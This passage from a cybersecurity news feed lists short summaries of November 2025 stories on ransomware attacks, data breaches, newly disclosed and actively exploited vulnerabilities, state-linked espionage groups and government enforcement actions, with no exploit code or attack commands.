A new global study by Semperis, the "2025 Holiday Ransomware Risk Report," confirms that threat actors strategically launch attacks during holidays and weekends to exploit reduced security staffing. The report found that 52% of organizations were targeted during these off-hour periods. Alarmingly, 78% of companies cut their Security Operation Center (SOC) staffing by 50% or more during these times. The study also revealed that 60% of attacks follow major corporate events like mergers or layoffs, when organizations are most distracted.

Nov 24, 2025 · 3 min read

Italian IT Firm Almaviva Hit by Cyberattack, 2.3TB of Data Leaked

The prominent Italian IT services provider Almaviva has confirmed it was hit by a major cyberattack, resulting in the theft and leaking of nearly 2.3 terabytes of sensitive data. The breach has exposed information from several of Almaviva's clients, most notably Italy's national railway operator, Ferrovie dello Stato Italiane. The leaked files reportedly include highly sensitive data such as passenger passport details, employee records, financial documents, and defense-related contracts. The identity of the attackers has not yet been disclosed.

Nov 24, 2025 · 5 min read

Harvard University Data Breach Exposes Donor Information After Phone Phishing Attack

Harvard University has disclosed a data breach affecting its Alumni Affairs and Development Office, discovered on November 18, 2025. The incident originated from a phone-based phishing (vishing) attack that gave an unauthorized party access to systems containing personal information and donation records of university affiliates and donors. While highly sensitive data like Social Security numbers were reportedly not compromised, the breach exposed names, contact details, and donation histories. This attack follows a similar pattern seen in recent incidents at Princeton University and the University of Pennsylvania, indicating a targeted campaign against the development departments of major educational institutions.

Nov 23, 2025 · 5 min read

Logitech Confirms Breach: Clop Ransomware Exploits Oracle Zero-Day

Logitech has confirmed it suffered a data breach after the Clop ransomware gang exploited a zero-day vulnerability in Oracle's E-Business Suite (CVE-2025-61882). The consumer electronics giant stated that an unauthorized third party accessed and copied data related to employees, consumers, and suppliers. The incident is part of a wider campaign by Clop that has impacted numerous major organizations. Logitech asserts that sensitive personal data like credit card numbers was not exposed and business operations remain unaffected.

Nov 23, 2025 · 5 min read

CISA KEV Alert: Actively Exploited Oracle RCE Flaw Allows Full System Takeover

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical remote code execution (RCE) vulnerability in Oracle Identity Manager, CVE-2025-61757, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, with a CVSS score of 9.8, allows an unauthenticated attacker to achieve RCE by chaining an authentication bypass with a code injection flaw in a Groovy script endpoint. Evidence of in-the-wild exploitation, including scans detected weeks before a patch was available, has prompted CISA to issue a patching deadline of December 12, 2025, for federal agencies.

Nov 22, 2025 · 5 min read

Chinese APT24 Group Uses 'BadAudio' Malware in Years-Long Espionage Campaign Targeting Taiwan

The Chinese-nexus threat group APT24, also known as Pitty Tiger, is behind a nearly three-year cyberespionage campaign utilizing a new custom malware called 'BadAudio'. According to Google's Threat Intelligence Group, the campaign, active since November 2022, has targeted organizations primarily in Taiwan. The group has evolved its tactics from broad web compromises to sophisticated supply chain attacks and spear-phishing. BadAudio is a C++ downloader that uses DLL search-order hijacking and control flow flattening to evade detection before deploying second-stage payloads like Cobalt Strike.

Nov 22, 2025 · 6 min read

Major Wall Street Banks Exposed After Breach at Mortgage Vendor SitusAMC

SitusAMC, a critical technology and services provider for the real estate finance industry, has disclosed a significant data breach discovered on November 12, 2025. The cyberattack compromised corporate information and, more critically, data belonging to its clients' customers, which could include sensitive personal information from mortgage applications. Major financial institutions, including JPMorgan Chase, Citigroup, and Morgan Stanley, have reportedly been notified of their potential exposure. The FBI is investigating the incident, which highlights the systemic risk posed by third-party vendors in the financial sector.

Nov 22, 2025 · 5 min read

Grafana Enterprise Hit by Critical 10.0 CVSS Flaw Allowing Admin Impersonation

Grafana Labs has patched a critical vulnerability, CVE-2025-41115, in Grafana Enterprise that carries the maximum CVSS score of 10.0. The flaw resides in the SCIM provisioning feature and allows a malicious SCIM client to escalate privileges and impersonate any user, including the default administrator, by manipulating the 'externalId' attribute. The vulnerability affects Grafana Enterprise versions 12.0.0 through 12.2.1 and requires specific feature flags to be enabled. Grafana has released patches and confirmed its own cloud instances were not exploited.

Nov 22, 2025 · 5 min read

CrowdStrike Fires Insider for Leaking Screenshots to 'Scattered Lapsus$ Hunters' Hacking Group

Cybersecurity giant CrowdStrike has confirmed it fired an employee last month for acting as a malicious insider. The employee leaked screenshots of internal systems, including an Okta dashboard, to the 'Scattered Lapsus$ Hunters' hacking group, who then posted them on Telegram. CrowdStrike stated that it detected and terminated the insider, that its corporate systems were not breached, and that no customer data was compromised. The hackers claimed to have offered the employee $25,000 for access, highlighting the persistent threat of malicious insiders even at top security firms.

Nov 22, 2025 · 5 min read

ShinyHunters Hits Salesforce Again, Breaching Customers via Gainsight App

Salesforce has disclosed a significant data breach affecting its customers, stemming from a compromised connection with the Gainsight customer success application. The notorious cybercrime group ShinyHunters, also tracked as UNC6240, has claimed responsibility for the attack, stating they exploited OAuth tokens to gain unauthorized access to approximately 285 additional Salesforce instances. In response, Salesforce has revoked credentials and removed the Gainsight apps from its AppExchange. The incident highlights the growing risk of supply chain attacks targeting trusted third-party SaaS integrations to pivot into major enterprise environments.

Nov 21, 2025 · 6 min read

SEC Abandons Landmark Lawsuit Against SolarWinds and its CISO

In a surprising move, the U.S. Securities and Exchange Commission (SEC) has voluntarily dismissed its civil enforcement action against SolarWinds and its CISO, Timothy G. Brown. The lawsuit, filed in October 2023, had accused the company and Brown of misleading investors about their cybersecurity posture before the 2020 SUNBURST supply chain attack. The dismissal is seen as a major victory for the cybersecurity community, which had feared the case would set a dangerous precedent for holding security executives personally liable for breaches and create a chilling effect on transparency.

Nov 21, 2025 · 5 min read

WEL Companies Investigated for Data Breach Affecting 122,960 People

The law firm Schubert Jonckheer & Kolbe LLP is investigating transportation and logistics firm WEL Companies, Inc., following a data breach that compromised the sensitive personal information of 122,960 people. The breach, which exposed names, Social Security numbers, and driver's license numbers, was first detected in January 2025. However, the company only began notifying victims in November 2025, a delay of nearly ten months that could lead to legal action for violating data breach notification laws.

Nov 21, 2025 · 4 min read

Patch Now: Microsoft Fixes Actively Exploited Windows Kernel Zero-Day

As part of its November 2025 Patch Tuesday release, Microsoft has addressed 63 security vulnerabilities, including a high-severity zero-day flaw in the Windows Kernel (CVE-2025-62215) that is confirmed to be under active exploitation. The vulnerability is a local privilege escalation (LPE) bug with a CVSS score of 7.0, allowing an attacker who has already gained initial access to a system to elevate their privileges to SYSTEM level. Such flaws are critical components in post-exploitation attack chains, enabling threat actors to take full control of a compromised machine. The update also fixes 16 remote code execution (RCE) vulnerabilities and numerous other flaws across the Microsoft product suite. Immediate patching is strongly recommended for all Windows users.

Nov 21, 2025 · 5 min read

Sinobi Ransomware Strikes US Manufacturer and Indian Tech Firm

The 'sinobi' ransomware group has claimed responsibility for two recent cyberattacks targeting organizations in the United States and India. The victims are Croft, a U.S.-based window and door manufacturer, and CHANGEPOND, an enterprise software company headquartered in Chennai, India. Both breaches were discovered on November 19, 2025, occurring within minutes of each other. These incidents underscore the global reach and indiscriminate targeting of ransomware operators, affecting diverse sectors including manufacturing and technology. The attacks highlight the persistent threat posed by ransomware and the importance of robust cybersecurity defenses.

Nov 20, 2025 · 4 min read

CISA and Partners Release Guide to Combat Bulletproof Hosting

The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the FBI, NSA, and international partners, has published a comprehensive guide to help network defenders and Internet Service Providers (ISPs) combat the threat of bulletproof hosting (BPH) providers. These services knowingly lease infrastructure to cybercriminals for a wide range of malicious activities, including ransomware, phishing, and malware distribution. The guide, 'Bulletproof Defense,' provides actionable recommendations for filtering malicious traffic, enhancing network monitoring, and improving intelligence sharing to disrupt the criminal ecosystem that relies on BPH for anonymity and resilience.

Nov 20, 2025 · 4 min read

CISA Issues 6 New ICS Advisories for Schneider Electric, Shelly, METZ CONNECT

On November 19, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released six new Industrial Control Systems (ICS) advisories, highlighting multiple vulnerabilities in products from Schneider Electric, Shelly, and METZ CONNECT. The alerts affect a range of operational technology (OT) products, including SCADA systems and power monitoring devices. Four of the advisories are for Schneider Electric products like EcoStruxure and PowerChute. CISA urges administrators in critical infrastructure and manufacturing sectors to review the advisories and apply the recommended mitigations to prevent potential exploitation.

Nov 20, 2025 · 4 min read

CISA Releases "Be Air Aware" Guides to Combat Drone Threats

As part of Critical Infrastructure Security and Resilience Month, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released three new guides under its "Be Air Aware™" campaign. These resources are designed to help critical infrastructure owners and operators understand, assess, and mitigate the growing security risks posed by Unmanned Aircraft Systems (UAS), or drones. The guides provide actionable information on detecting suspicious drone activity, implementing detection technologies, and safely handling downed aircraft, aiming to integrate aerial threat considerations into existing security plans.

Nov 20, 2025 · 4 min read

New 'Nova Stealer' Malware Targets macOS Crypto Wallets

A new information-stealing malware, dubbed 'Nova Stealer,' has been discovered actively targeting Apple macOS users. The malware's primary goal is the exfiltration of sensitive data, with a specific focus on cryptocurrency wallets. Nova Stealer operates as a trojan, infecting systems by replacing legitimate, installed applications with malicious versions. When a user launches the compromised application, the malware activates in the background to search for and steal wallet files and other valuable information. This discovery underscores the increasing trend of threat actors developing malware for the macOS platform, challenging the perception of it being inherently more secure than Windows.

Nov 20, 2025 · 4 min read

Inc Ransom Cripples PA Attorney General's Office, Exfiltrates 5.7 TB of Data

The Pennsylvania Office of the Attorney General (OAG) has confirmed it suffered a severe data breach orchestrated by the Inc Ransom ransomware group. The attackers exploited the 'CitrixBleed2' vulnerability (CVE-2025-5777) to gain initial access and subsequently exfiltrated 5.7 terabytes of highly sensitive data. The stolen information includes Social Security numbers, medical details, and confidential investigative files. The attack, which occurred in August 2025, caused a three-week operational disruption for the agency's 1,200 staff members. The OAG has refused to pay the ransom and is working with the FBI on the investigation.

Nov 19, 2025 · 7 min read

US, UK, and Australia Sanction Russian Bulletproof Hosting Network Aiding Ransomware

In a coordinated action, the United States, United Kingdom, and Australia have sanctioned Media Land, LLC, a Russian bulletproof hosting provider, along with its network of related entities and key individuals. This infrastructure is accused of providing essential services to a wide range of global cybercriminals, including malware distributors, phishing operators, and ransomware groups like the notorious LockBit gang. The sanctions aim to disrupt the foundational services that enable cybercrime by targeting the providers who knowingly support malicious operations. The action highlights a strategic international effort to dismantle the cybercrime economy.

Nov 19, 2025 · 6 min read

CISA Adds Actively Exploited Fortinet FortiWeb Flaw to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical OS command injection vulnerability in Fortinet's FortiWeb products, CVE-2025-58034, to its Known Exploited Vulnerabilities (KEV) catalog. Citing evidence of active exploitation, CISA has mandated a one-week remediation deadline for Federal Civilian Executive Branch (FCEB) agencies under Binding Operational Directive (BOD) 22-01. The vulnerability allows attackers to execute arbitrary commands on affected devices. CISA strongly urges all organizations using FortiWeb to prioritize patching this flaw to mitigate the threat.

Nov 19, 2025 · 6 min read

Chicago's St. Anthony Hospital Discloses Data Breach Affecting Over 6,600

St. Anthony Hospital in Chicago has reported a data breach that may have exposed the personal and medical information of more than 6,600 patients and staff members. The incident, which was discovered in February 2025, occurred when an unauthorized party gained access to several employee email accounts. An investigation revealed that the compromised accounts contained sensitive data, including names, Social Security numbers, medical record numbers, and medical histories. The hospital states there is no evidence the data has been misused but is in the process of notifying all affected individuals.

Nov 19, 2025 · 6 min read

Supply Chain Attacks & AI-Powered Phishing Surge Across Asia-Pacific, Darktrace Warns

A new threat report from cybersecurity firm Darktrace highlights a dramatic increase in sophisticated cyber threats across the Asia-Pacific and Japan (APJ) region. The report, covering the 12 months to July 2025, details a surge in supply chain attacks, business email compromise, and cloud intrusions. State-sponsored groups from China (APT40, APT41) and North Korea (Lazarus/Bluenoroff) are reportedly leveraging generative AI to create more convincing phishing emails, particularly in non-English languages like Japanese. The report also notes the high cost of supply chain breaches and the use of advanced voice-phishing by groups like Scattered Spider.

Nov 19, 2025 · 7 min read

China-Aligned APT 'PlushDaemon' Wields 'EdgeStepper' Implant for Network Hijacking

Security researchers have uncovered a new, sophisticated network implant named 'EdgeStepper' used by the China-aligned APT group PlushDaemon. The implant provides the attackers with adversary-in-the-middle (AitM) capabilities, allowing them to intercept and hijack legitimate software updates within a compromised network. EdgeStepper is deployed as part of a larger toolset that includes 'LittleDaemon' and 'DaemonicLogistics' to deliver a Windows implant called 'SlowStepper'. This framework enables the APT group to conduct espionage and deploy additional malware by masquerading as legitimate update traffic.

Nov 19, 2025 · 7 min read

Togo and Mozambique Forge Cybersecurity Pact to Strengthen African Defenses

The nations of Togo and Mozambique have signed a Memorandum of Understanding (MoU) to formalize their cooperation on cybersecurity. The agreement, signed during the inaugural International Cybersecurity Week in Mozambique, establishes a framework for their national Computer Security Incident Response Teams (CSIRTs) to collaborate. The partnership will focus on sharing real-time threat intelligence, conducting joint capacity-building exercises, and coordinating operational responses to cyber incidents, aiming to bolster the digital resilience of both nations and the wider African continent.

Nov 19, 2025 · 4 min read

Vendor Breach Exposes Patient Data at Innovative Physical Therapy

Innovative Physical Therapy has notified patients of a data breach that originated from a third-party vendor responsible for practice management. The breach occurred when two vendor employees fell victim to phishing emails, leading to the compromise of their email accounts. Between June 25 and June 26, 2025, an unauthorized party accessed these accounts, which contained the protected health information (PHI) and personally identifiable information (PII) of at least 2,023 patients. The exposed data includes names, Social Security numbers, medical information, and health insurance details.

Nov 19, 2025 · 6 min read

Urgent Patch Required: Critical RCE Flaw in W3 Total Cache WordPress Plugin

A critical command injection vulnerability, CVE-2025-9501, with a CVSS score of 9.0, has been found in the W3 Total Cache WordPress plugin, which is active on over one million websites. The flaw allows unauthenticated attackers to achieve remote code execution (RCE) by simply submitting a malicious comment. This enables a complete site takeover. All versions prior to 2.8.13 are affected, and administrators are urged to update immediately.

Nov 18, 2025 · 5 min read

Kenyan Government Websites Defaced in Coordinated Cyberattack

On November 17, 2025, a coordinated cyberattack targeted and temporarily disabled numerous Kenyan government websites. The Ministry of Interior and National Administration confirmed the breach, which impacted the websites of the State House and ministries of Health, Education, and Energy, among others. Reports indicate several of the compromised sites were defaced with white supremacist slogans and symbols. The Kenyan government has since restored services and vowed to bring the perpetrators to justice.

Nov 18, 2025 · 5 min read

Merck Employee Data Breached in Third-Party Vendor Incident

Pharmaceutical giant Merck has confirmed a data breach impacting its current and former employees due to a cybersecurity incident at a third-party service provider, Graebel Companies. The breach, which occurred in September 2025, was disclosed on November 17. Exposed data includes sensitive PII such as names, Social Security numbers, and financial account information. Merck is offering 24 months of complimentary credit monitoring services to affected individuals.

Nov 18, 2025 · 5 min read

WordPress Security Plugin Ironically Contains Critical File-Read Flaw

A critical vulnerability, CVE-2025-11705, has been discovered in the 'Anti-Malware Security and Brute-Force Firewall' WordPress plugin, which is active on over 100,000 sites. The flaw allows any authenticated user, including low-privilege subscribers, to read arbitrary files from the server. This can be exploited to access the sensitive wp-config.php file, leading to a full database compromise and site takeover. Users are urged to update the plugin immediately.

Nov 18, 2025 · 5 min read

NSFOCUS Mitigates Massive 843 Gbps DDoS Attack on Critical Infrastructure

Security vendor NSFOCUS has detailed its successful effort to mitigate a massive multi-vector DDoS attack that targeted a critical infrastructure operator in October 2025. The attack peaked at an enormous 843.4 Gbps and 73.6 million packets per second, sustaining high volumes for over 30 minutes. The assault was dominated by a UDP flood, accounting for over 600 Gbps of the traffic. NSFOCUS's Cloud DDoS Protection Service successfully filtered over 99.9% of the malicious traffic, keeping the operator's services online.

Nov 18, 2025 · 5 min read

Cl0p Gang Exploits Oracle Zero-Day to Breach Logitech, Washington Post, and More

The notorious Cl0p cyber extortion gang has orchestrated a massive data breach campaign by exploiting a zero-day vulnerability in Oracle's E-Business Suite (EBS), tracked as CVE-2025-61882. Swiss electronics giant Logitech has confirmed it was a victim, filing a data breach notification with the SEC. The campaign has also compromised other major organizations, including The Washington Post, Allianz UK, and GlobalLogic. Cl0p is known for exploiting vulnerabilities in widely-used enterprise software to simultaneously hit a large number of high-value targets, exfiltrating data for double extortion.

Nov 18, 2025 · 5 min read

DoorDash Hit by Data Breach After Employee Targeted in Social Engineering Scam

Food delivery service DoorDash has confirmed a data breach after an employee was compromised by a social engineering scam, allowing an unauthorized third party to access internal systems. The breach exposed the names, physical addresses, phone numbers, and email addresses of an undisclosed number of customers in the United States, Canada, Australia, and New Zealand. The company has stated that financial information was not accessed. This incident highlights the persistent threat of attackers targeting the 'human element' to bypass technical security controls.

Nov 17, 2025 · 4 min read

Iranian APT 'SpearSpecter' Targets Officials' Families in Sophisticated Espionage Campaign

The Iranian state-sponsored group APT42, also known by aliases like SpearSpecter, is conducting a highly sophisticated and ongoing espionage campaign targeting senior defense and government officials. According to the Israel National Digital Agency, the threat actors are using advanced social engineering tactics, including building trust over weeks and targeting victims' family members to apply psychological pressure. The campaign's technical core is 'TameCat,' a modular PowerShell-based backdoor that operates in-memory and uses legitimate services like Telegram and Discord for stealthy command-and-control.

Nov 17, 2025 · 5 min read

Eurofiber Breach Exposes Thales, Orange, and French Government Data in Major Supply Chain Incident

European digital infrastructure provider Eurofiber has confirmed a major data breach in its French division, potentially exposing sensitive data from over 3,600 clients, including major corporations like Thales and Orange, and several French government ministries. A threat actor known as 'ByteToBreach' claims to have exploited vulnerabilities (CVE-2024-29889, CVE-2025-24799) in Eurofiber's GLPI IT asset management software via SQL injection. The stolen data, now for sale on the dark web, allegedly includes highly sensitive information such as SSH private keys, VPN configurations, and API keys, posing a severe supply chain risk.

Nov 17, 2025 · 5 min read

Pro-Russian Hackers Target Denmark with DDoS Attacks Ahead of Elections

The pro-Russian hacktivist group NoName057(16) has claimed responsibility for a series of Distributed Denial-of-Service (DDoS) attacks that targeted Danish government websites, political parties, and defense-related entities. The attacks, which occurred just before Denmark's municipal and regional elections, were designed to cause disruption and informational noise. Targets included the Danish Ministry of Transport and the national citizen portal, Borger.dk. While the outages were brief, the incident aligns with a pattern of politically motivated cyber activity by the group against European nations supporting Ukraine.

Nov 17, 2025 · 4 min read

Microsoft Patches Actively Exploited Windows Kernel Zero-Day in November Update

As part of its November 2025 Patch Tuesday release, Microsoft has addressed 63 security flaws, including a zero-day vulnerability in the Windows Kernel (CVE-2025-62215) that is being actively exploited. The flaw is an elevation of privilege vulnerability with a CVSS score of 7.0, allowing a local attacker to gain SYSTEM-level access. The vulnerability affects all supported versions of Windows and Windows Server. Due to its active exploitation in the wild, immediate patching is strongly recommended.

Nov 17, 2025 · 3 min read

Critical RCE Flaws in AI Engines From Meta, NVIDIA, Microsoft Discovered

Security researchers have discovered critical remote code execution (RCE) vulnerabilities in widely used AI inference servers from major tech companies, including Meta, NVIDIA, and Microsoft, as well as open-source projects like vLLM. The vulnerabilities stem from the unsafe use of Python's 'pickle' module for data deserialization and exposed ZeroMQ (ZMQ) messaging endpoints. Exploitation could allow attackers to take full control of AI models and servers, posing a significant risk to enterprise AI infrastructure. Some flaws, termed 'Shadow Vulnerabilities,' remain unpatched in production environments.

Nov 16, 2025 · 6 min read

RansomHouse Hits H&M and Adidas Supplier in Major Fashion Supply Chain Attack

The RansomHouse ransomware group has attacked Fulgar S.p.A., a major Italian textile manufacturer and a key supplier for global fashion brands like H&M and Adidas. The attack, confirmed on November 3, 2025, resulted in the exfiltration and leak of sensitive corporate data. This incident highlights the significant and growing risk of supply chain attacks in the fashion industry, where a compromise at a single supplier can have cascading impacts on major international retailers.

Nov 16, 2025 · 5 min read

Pig Butchering Scams Evolve into Global Cybercrime Menace, FBI Warns

A new threat intelligence report, supported by warnings from the FBI, details the rapid evolution of "Pig Butchering" scams into one of the most economically damaging forms of global cybercrime. These sophisticated, long-con investment schemes leverage social engineering, emotional grooming, and fraudulent cryptocurrency trading platforms to defraud victims of massive sums. The scam involves building a relationship of trust over weeks or months before convincing the victim to invest in a fake, high-yield opportunity.

Nov 16, 2025 · 6 min read

APT Caught Exploiting Cisco & Citrix Zero-Days in Sophisticated Attack

Amazon's threat intelligence team has discovered a sophisticated advanced persistent threat (APT) campaign that exploited two separate zero-day vulnerabilities in Cisco Identity Service Engine (CVE-2025-20337) and Citrix products (CVE-2025-5777) before they were publicly known. The attackers used the flaws to gain pre-authentication remote code execution and deployed custom, in-memory malware designed to evade detection. This discovery highlights a growing trend of targeting identity and access management systems at the network edge and underscores the capabilities of highly-resourced threat actors.

Nov 16, 2025 · 6 min read

Ransomware Attacks Surge 50% in 2025; Qilin Group Takes the Lead

Cybersecurity researchers report a staggering 50% increase in ransomware attacks in 2025, with over 5,000 incidents claimed on dark web leak sites by late October. This surge occurs amidst a significant realignment in the ransomware ecosystem, with formerly dominant groups fading while new and resurgent actors like Qilin take their place. The Qilin group has been particularly prolific, leading in victim counts for most of the past six months. The United States remains the most targeted nation, and the industrial sector is the most heavily impacted industry. PowerShell has become the primary tool for attackers, used in nearly 78% of observed campaigns.

Nov 15, 2025 · 5 min read

Checkout.com Rejects Ransom After ShinyHunters Breach, Donates to Research

The global payment processor Checkout.com has disclosed a data breach orchestrated by the ShinyHunters cybercrime group. The attackers exploited a legacy third-party cloud file storage system that was improperly decommissioned. After being contacted with a ransom demand, Checkout.com refused to pay. In a bold move, the company announced it will instead donate the equivalent ransom amount to cybersecurity research institutions, including Carnegie Mellon University and the University of Oxford. The breach did not impact the core payment platform or cardholder data.

Nov 15, 2025 · 4 min read

Fortinet Patches Actively Exploited FortiWeb Zero-Day (CVE-2025-64446)

Fortinet has released a patch for a critical, actively exploited zero-day vulnerability in its FortiWeb web application firewall (WAF). The flaw, tracked as CVE-2025-64446, is a relative path traversal vulnerability that allows an unauthenticated remote attacker to execute arbitrary administrative commands by sending specially crafted HTTP/S requests. Due to evidence of active exploitation, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating that federal agencies patch it immediately. The flaw affects a wide range of FortiWeb versions, making immediate patching a top priority for all customers.

Nov 15, 2025 · 4 min read

150,000+ Malicious NPM Packages Flood Registry in Crypto Token Farming Scheme

Security researchers from Amazon have uncovered one of the largest package flooding incidents in the history of the npm open-source registry, involving over 150,000 malicious packages. In a novel twist, the campaign was not designed for traditional malicious activities like stealing credentials or deploying ransomware. Instead, the attackers aimed to conduct a large-scale token farming operation by exploiting the incentive system of tea.xyz, a decentralized protocol that rewards open-source developers with 'TEA tokens'. The self-replicating packages automatically generated and published new junk packages, each linked to the attackers' blockchain wallets, polluting the ecosystem and abusing the reward mechanism.

Nov 15, 2025 · 4 min read

Critical 9.8 CVSS Auth Bypass Flaw in NVIDIA AIStore Disclosed

The Zero Day Initiative (ZDI) has publicly disclosed a critical authentication bypass vulnerability in NVIDIA's AIStore, an open-source object storage platform for AI applications. The flaw, tracked as CVE-2025-33186, carries a CVSS score of 9.8 and is caused by hard-coded credentials within the platform's authentication component. A remote, unauthenticated attacker could exploit this vulnerability to completely bypass authentication and gain unauthorized access to the system, compromising the confidentiality and integrity of AI models and data. A second, high-severity information disclosure flaw (CVE-2025-33185) was also disclosed.

Nov 15, 2025 · 4 min read

CISA Warns Cisco ASA Devices Still Under Attack, Issues New Patch Guidance

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued follow-up implementation guidance for its September Emergency Directive 25-03, which addresses two critical, actively exploited vulnerabilities in Cisco ASA and Firepower devices. The flaws, a remote code execution bug (CVE-2025-20333) and a privilege escalation bug (CVE-2025-20362), are still being targeted by threat actors, including the China-linked group Storm-1849 (ArcaneDoor). CISA warns that many organizations incorrectly applied patches, leaving them vulnerable. The new guidance provides corrective actions and recommends further mitigation for devices that were not updated properly.

Nov 15, 2025 · 4 min read

Search Guard FLX Vulnerability (CVE-2025-12149) Allows DLS Bypass

A medium-severity information disclosure vulnerability, CVE-2025-12149, has been disclosed in floragunn's Search Guard FLX, a security plugin for Elasticsearch. The flaw, affecting versions up to 3.1.2, allows an attacker to bypass Document-Level Security (DLS) rules. This occurs specifically when a search is triggered from a Signals watch, an alerting component of the plugin. A low-privileged user who can create or trigger a watch could exploit this to access all documents in queried indices, exposing sensitive data that should be protected by DLS permissions.

Nov 15, 2025 · 3 min read

AWS Outage in us-east-1 Knocks Major Global Services Offline

A significant infrastructure fault within Amazon Web Services' (AWS) us-east-1 region in North Virginia on October 20, 2025, triggered a global outage affecting numerous major online services. Platforms including Snapchat, Fortnite, Disney Plus, and various banking applications experienced widespread disruptions. The incident, caused by issues with core services like DynamoDB and EC2, highlights the critical dependency of the digital economy on a few major cloud providers and underscores the importance of robust architectural resilience.

Nov 14, 2025 · 6 min read

Palo Alto Firewalls Vulnerable to Remote Reboot Attack via DoS Flaw

Palo Alto Networks has disclosed a medium-severity denial-of-service (DoS) vulnerability, CVE-2025-4619, affecting its PAN-OS software. The flaw enables an unauthenticated, remote attacker to reboot firewalls by sending specially crafted packets. Repeated exploitation can force the device into maintenance mode, disrupting network traffic and disabling security protections. The vulnerability impacts PA-Series and VM-Series firewalls with specific configurations. Patches are available and customers are urged to upgrade.

Nov 14, 2025 · 4 min read

Suspected GRU 'Fancy Bear' Hacker Linked to 2016 Election Interference Arrested in Thailand

A Russian national believed to be Aleksey Lukashev, a high-level military intelligence officer in Russia's GRU, has been arrested in Phuket, Thailand. The arrest was part of a joint operation between Thai authorities and the U.S. FBI. Lukashev is one of 12 GRU officers indicted by the U.S. Department of Justice in 2018 for his alleged role in the APT28 (Fancy Bear) hacking operations that targeted Democratic Party organizations during the 2016 U.S. election. He now faces extradition to the United States.

Nov 14, 2025 · 3 min read

Team Europe Wins Global Cybersecurity Challenge for Fourth Consecutive Year

For the fourth year in a row, Team Europe has won the International Cybersecurity Challenge (ICC), a prestigious global competition designed to showcase and develop young cybersecurity talent. The event, hosted in Tokyo, Japan, brought together teams from eight regions worldwide. Organized and supported by the EU Agency for Cybersecurity (ENISA), the victory highlights Europe's strong investment in nurturing the next generation of cybersecurity professionals. Team Asia and the US Cyber Team secured second and third place, respectively.

Nov 14, 2025 · 2 min read

Anthropic Disrupts First AI-Orchestrated Cyber Espionage Campaign

AI safety and research company Anthropic has reported disrupting what it believes is the first large-scale cyber espionage campaign orchestrated by an AI with a high degree of autonomy. The company detected a threat actor, assessed to be a Chinese state-sponsored group, manipulating its 'Claude Code' AI tool. The AI was used to attempt infiltration of approximately 30 global organizations, including tech companies, financial institutions, and government agencies. The incident marks a significant evolution in the use of AI in offensive cyber operations.

Nov 14, 2025 · 4 min read

New Tools From Legit Security and Cyware Tackle AI Code and Ops Risks

As AI adoption accelerates in software development and security, vendors are releasing new solutions to manage the inherent risks. Legit Security has launched 'VibeGuard,' a tool designed to secure AI-generated code within integrated development environments (IDEs). Simultaneously, Cyware has upgraded its 'Quarterback AI' platform to function as an 'AI Fabric' for security operations, aiming to boost threat intelligence and analyst productivity. These launches highlight the industry's focus on both securing AI's use and using AI for defense.

Nov 14, 2025 · 3 min read

Patch Now: Microsoft Scrambles to Fix Actively Exploited Windows Kernel Zero-Day

Microsoft has released its November 2025 Patch Tuesday updates, addressing 63 vulnerabilities, including a critical zero-day in the Windows Kernel (CVE-2025-62215) that is being actively exploited in the wild. This privilege escalation flaw allows local attackers to gain full SYSTEM-level control of affected Windows and Windows Server systems. Due to its active exploitation, CISA has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating immediate patching for federal agencies. The update also fixes four other critical flaws, including a severe remote code execution vulnerability (CVE-2025-60724) in the Microsoft Graphics Component.

Nov 13, 2025 · 6 min read

GAME OVER: 'Operation Endgame' Dismantles Global Cybercrime Services

In a massive international crackdown dubbed 'Operation Endgame,' law enforcement agencies from 11 countries, coordinated by Europol, have dismantled the infrastructure of three major cybercrime-as-a-service platforms: the Rhadamanthys information stealer, the VenomRAT remote access trojan, and the Elysium botnet. The operation resulted in the seizure of over 1,025 servers, the takedown of 20 domains, and the arrest of the main suspect behind VenomRAT. The targeted malware was responsible for infecting hundreds of thousands of computers worldwide, stealing vast amounts of data and millions in cryptocurrency.

Nov 13, 2025 · 5 min read

Synnovis Confirms Patient Data Stolen in Qilin Ransomware Attack on London Hospitals

Pathology service provider Synnovis has officially confirmed that patient personal data, including names, NHS numbers, and dates of birth, was stolen during the June 2024 ransomware attack attributed to the Qilin gang. The attack caused widespread disruption to London hospitals, leading to the cancellation of over 1,100 procedures. After a lengthy forensic investigation, and after the attackers had leaked approximately 400GB of data, Synnovis acknowledged the breach. Affected NHS trusts are now beginning the process of notifying individual patients whose information was compromised.

Nov 13, 2025 · 6 min read

Retailers Unprepared for AI-Powered Cyberattack Tsunami, Report Warns

A new report from managed security provider LevelBlue reveals a troubling state of cybersecurity in the retail sector. The study found that 44% of retailers have experienced a significant increase in cyberattacks, with many feeling unprepared for the next wave of AI-powered threats. Despite 45% of executives expecting AI-driven attacks, only 25% believe their organization is ready to defend against them. The report also highlights major weaknesses in supply chain security, with nearly half of retailers admitting to having poor visibility into their suppliers' security practices, creating significant risk across the industry.

Nov 13, 2025 · 5 min read

Dell Patches Critical 9.1 CVSS Flaw in Data Lakehouse Platform

Dell has released a security update to address a critical vulnerability (CVE-2025-46608) in its Data Lakehouse platform, which received a CVSS score of 9.1. The flaw is an improper access control issue that could be exploited by a remote, high-privileged attacker to gain further elevated rights and potentially compromise the entire system. Due to the severity and the potential for a complete confidentiality, integrity, and availability loss, Dell is urging all customers to upgrade to version 1.6.0.0 immediately.

Nov 13, 2025 · 5 min read

CISA KEV Alert: WatchGuard and Triofox Flaws Now Under Active Attack

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, indicating they are under active attack. The additions include CVE-2025-9242, an out-of-bounds write flaw in WatchGuard Firebox appliances, and CVE-2025-12480, an improper access control vulnerability in Gladinet's Triofox product. The third is the recently disclosed Windows Kernel zero-day, CVE-2025-62215. Federal agencies are now mandated to patch these flaws by a specified deadline, and CISA strongly urges all organizations to prioritize remediation.

Nov 13, 2025 · 4 min read

Stealthy Phishing Attack Uses HTML Smuggling & Telegram Bots to Steal Credentials

